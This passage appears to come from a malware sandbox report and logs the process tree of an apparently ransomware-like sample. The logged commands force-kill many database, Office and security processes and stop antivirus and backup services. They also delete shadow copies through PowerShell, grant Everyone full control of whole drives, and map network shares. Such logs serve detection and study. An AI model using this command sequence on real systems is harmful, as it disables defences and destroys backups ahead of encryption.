- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:5520
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3620
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3764
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3820
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3900
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3948
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3956
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4076
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4092
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2500
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2676
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.17
  2⤵
  PID:4628
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2828
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2884
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2620
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4084
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4052
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4044
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4036
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4028
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4012
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4004
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3996
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3988
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3972
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3964
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3924
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3884
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3876
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3868
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3860
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3844
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3828
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:3812
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3804
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3796
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3780
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3772
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3756
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3748
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3740
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3724
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3708
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3700
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3684
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3676
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3660
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3644
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3636
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Windows\system32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:3612
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:3596
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:3588
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:3580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:7096
- C:\Windows\system32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:3572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:6940
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:3564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:2676
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:3548
- C:\Windows\system32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:3528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:5716
- C:\Windows\system32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:3520
- C:\Windows\system32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:3504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:7020
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3488
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:3480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:6916
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:3472
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:3464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:7104
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:3456
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:3448
- C:\Windows\system32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:3424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:6668
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:3392
- C:\Windows\system32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:3384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:7068
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:3376
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:3360
- C:\Windows\system32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:3136
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:3128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:6932
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:3112
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:3104
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:3096
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3088
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:3080
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:2252
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:2980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:6924
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:2320
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:2932
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:2856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:7000
- C:\Windows\system32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:2680
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:1740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:7028
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:2292
- C:\Windows\system32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:2164
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:2904
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:2940
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:2560
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2360
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:1184
- C:\Windows\system32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:2540
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2456
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:2952
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:2116
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:3020
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:2328
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:3012
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:2816
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:2088
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:2132
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:2208
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:3064
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:2188
- C:\Windows\system32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:2352
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:2128
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:2264
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:3028
- C:\Windows\system32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:2728
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:640
- C:\Windows\system32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:2704
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:1736
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:2308
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:332
- C:\Windows\system32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:2996
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:2880
- C:\Windows\system32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:2072
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:1636
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:1164
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:2752
- C:\Windows\system32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:2304
- C:\Windows\system32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:2688
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:2220
- C:\Windows\system32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:2152
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:2312
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:1072
- C:\Windows\system32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:2300
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:2956
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:2624
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:2968
- C:\Windows\system32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:2936
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:2536
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:2592
- C:\Windows\system32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:3008
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:1532
- C:\Windows\system32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:2504
- C:\Windows\system32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:3048
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:1600
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:2056
- C:\Windows\system32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:2308
- C:\Windows\system32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:1064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:7076
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:4452
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.15
  2⤵
  PID:5144
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp43DC.bat
  2⤵
  PID:2604
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start upnphost /y
1⤵
PID:2108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:2120

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
1⤵
PID:2132
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
  2⤵
  PID:6552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:2312
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop “Sophos Clean Service” /y
  2⤵
  PID:5004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:2376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:2404

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "79316849-1317316605-1482524634842488760-981463201496612499-12982308711741647466"
1⤵
PID:1828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:2272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:2172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
1⤵
PID:2160

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "328016384-6575028232038444671-860889399-67954752-12604446918253917521363229436"
1⤵
PID:2664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "173388014117996430101962245969-1657192873170148184168612034110647344961697131705"
1⤵
PID:2756

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1506263308-272299776-2141277025-109893786-141562034-1351509816-182950720052366794"
1⤵
PID:2924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1081222267738791350-15205956691409487293426924222-9925037836713473221874040431"
1⤵
PID:2900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-154432989155446625-1699508136220071788-16323738421823701184-8225741761114373903"
1⤵
PID:292

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-99747808-7006985281246302652-8330455521455523972-38355950955895078927170308"
1⤵
PID:2448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:5020

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-10236310279639063242128144405-19808835451697970261-801962208-968972999-1254815755"
1⤵
PID:2800

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:2104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:5164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:5172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:5232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:5524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:5536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:5636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:5720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:5796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:4500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:4024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:5812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:5620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:5572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:5128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:4548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:4180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:4140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:2780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:3916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:5028

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1432977703723125908-5161374121630215424440648570-521883556-7376263741995213045"
1⤵
PID:2604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:5276

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-481646804-4503425021392929745-297865714746181451-154904120-2045943329-82280328"
1⤵
PID:2916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1093112749-741400920-389649551356409930-14631225751764181391206326172-748292174"
1⤵
PID:2708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:5396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:5308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:5328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:5460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:5508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "371154185-32279722-1309674175-1262847608-459166189671502850-618313060-620388815"
1⤵
PID:2724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13582329281423573546-1198694763-17333530071696084566-89527249-544364875-1548023126"
1⤵
PID:2740

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-241141631-118434284343208079560569040816780932022703904091647752142-1379422338"
1⤵
PID:2336

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1115835243-1826024899-314391162-20506294161278196756122616041750972484-1780575220"
1⤵
PID:2788

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "303575823-205008656670765420315868614415829737771280706040-768049139-719403389"
1⤵
PID:2812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:5696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:5772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:5704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:5888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
